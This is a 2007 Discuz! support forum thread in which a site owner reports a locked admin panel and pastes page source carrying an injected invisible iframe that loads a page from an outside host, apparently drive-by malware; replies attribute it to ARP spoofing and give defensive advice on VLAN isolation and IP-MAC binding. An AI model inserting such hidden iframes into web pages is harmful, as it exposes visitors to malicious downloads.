Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

现在用discuz被怎么办?

[复制链接]
gmayi 发表于 2007-12-20 09:39:49 | 显示全部楼层 |阅读模式
现在后台管理登陆不了,
用IE浏览器查看原码
http://www.yote.cn/admincp.php这个页面
<iframe src=http://haha.haha1516.com/web/8841392.htm?785 width=100 height=0></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Discuz! Administrator's Control Panel</title>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<link href="./images/admincp/login.css" rel="stylesheet" type="text/css" />
</head>
<script language="JavaScript">
if(self.parent.frames.length != 0) {
        self.parent.location=document.location;
}
function redirect(url) {
        window.location.replace(url);
}
</script>
<br /><br /><br /><br />
<table width="600" border="0" cellpadding="8" cellspacing="0" class="logintable">
<tr class="loginheader"><td width="80"></td><td width="100"></td><td></td><td width="120"></td><td width="80"></td></tr>
<tr style="height:40px"><td>&nbsp;</td>
<td class="line1"><span style="color:#ffff66;font-size:14px;font-weight: bold;">系统设置</span></td>
<td class="line1">&nbsp;</td>
<td class="line1">&nbsp;</td>
<td>&nbsp;</td></tr>
<tr><td>&nbsp;</td><td class="line2">&nbsp;</td><td class="line2">&nbsp;</td><td class="line2">&nbsp;</td><td>&nbsp;</td></tr>
<form method="post" name="login" action="admincp.php?frames=yes&"><input type="hidden" name="sid" value="1Fcfnr"><input type="hidden" name="frames" value="yes><input type="hidden" name="url_forward" value=""><tr><td>&nbsp;</td><td align="right">用户名:</td><td>股票专家</td><td><a href="logging.php?action=logout&amp;formhash=eaf3365f&referer=index.php" target="_blank">退出</a></td><td>&nbsp;</td></tr><tr><td>&nbsp;</td><td align="right">密    码:</td><td><input type="password" name="admin_password" size="25"></td><td>&nbsp;</td><td>&nbsp;</td></tr><tr><td>&nbsp;</td><td class="line1">&nbsp;</td><td class="line1" align="center"><input type="submit" class="button" value="提 交" /></form><script language="JavaScript">document.login.admin_password.focus();</script></td><td class="line1">&nbsp;</td><td>&nbsp;</td></tr><tr><td>&nbsp;</td><td class="line2">&nbsp;</td><td class="line2">&nbsp;</td><td class="line2">&nbsp;</td><td>&nbsp;</td></tr>
<tr><td colspan="5" align="center">Powered by <a href="https://discuz.dismall.com" target="_blank" style="color: #fff"><b>Discuz!</b></a>
&nbsp;&copy; 2001-2007 <a href="http://www.comsenz.com" target="_blank" style="color: #fff">Comsenz Inc.</a></td></tr>
<tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr></table>
</html>
根据以往的经验<iframe src=http://haha.haha1516.com/web/8841392.htm?785 width=100 height=0></iframe><!这个应该是个病毒,
我在替换一个新的原文件上去,也是不行的,不知道该如何处理的,希望有高手可以指点
www.9du.cc 发表于 2007-12-20 09:42:37 | 显示全部楼层
我看了下 好像不是你自己的站被黑客挂了  好像是整个服务器中了ARP攻击 不停的传输病毒包

联系下空间商或者机房,停止了攻击服务器即可、

俺是九度合租网的技术  遇到过很多次这样的问题  一般是机房内的局域网攻击
回复

使用道具 举报

www.9du.cc 发表于 2007-12-20 09:43:40 | 显示全部楼层
你可以登陆FTP后 下载个你的html页面或者其他页面 然后用DW打开看看里面有没有这个代码  如果没有那就是ARP攻击 如果有那你就彻底。。。。。。
回复

使用道具 举报

 楼主| gmayi 发表于 2007-12-20 09:57:13 | 显示全部楼层
谢谢大家的指点
如果是arp攻击要怎么处理的
回复

使用道具 举报

www.9du.cc 发表于 2007-12-20 10:26:39 | 显示全部楼层
如果是ARP攻击的话 你可以联系空间商 或者机房 他们有办法处理的 一般封掉攻击的IP即可
回复

使用道具 举报

xy100200 发表于 2007-12-20 23:57:27 | 显示全部楼层
服务器上安装 APR金山防火墙 可以暂时解决 比较简单的方法...
主要还是要靠机房 活你的空间提供商来彻底解决
回复

使用道具 举报

it1988.com 发表于 2007-12-21 00:08:13 | 显示全部楼层
回复

使用道具 举报

pc77maikongjian 发表于 2007-12-21 10:15:24 | 显示全部楼层
转楼上的文字:

中了ARP欺骗的有这样几种表现形式及解决方法1, 直接断网.服务器连接不能网络.
2, 没断网,但服务器里面的部分网站打开都是乱码;或是打开网站就是下载网站程序;或是杀毒软件提示有病毒;或是好像被挂马了一样的,但不是挂马了,在你程序里是找不到马的.
3, 服务器时断时好的.
4, 其它.........

以上表现形式基本上都是ARP搞的怪.

解决方法:
1, 要机房解决,查出是谁的服务器中了ARP,查出后先停它服务器,以免影响整个机房.
2, 服务器装防ARP的,但不是万能的.
3, 360安全卫士里面也带防ARP软件.

外部防护

  • 1、此防护区域使用独立网关,从电信路由层以独立VLAN的物理结构方式接入,与其他非防护区域服务器完全隔离

内部防护

  • 2、防护专区中心交换机以机柜为单位划分VLAN,保证机柜之间无法直接通信,防止机柜之间的ARP 欺骗攻击。防护专区中心交换机进行 IP段—MAC---交换机端口 配对绑定,服务器只能在指定交换机机柜和指定交换机端口使用,防止内部ARP攻击机截获网关数据,进行欺骗攻击。

    3、机柜交换机进行 IP—MAC—交换机端口 配对绑定,服务器只能在指定交换机端口使用,防止内部ARP攻击机发送虚假IP 地址,虚假MAC地址,伪造网关,进行欺骗攻击。

    4、机柜交换机进行 网关IP—网关MAC 静态绑定,为机柜内部服务器提供静态的网关MaC地址解析。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-20 00:34 , Processed in 0.031198 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表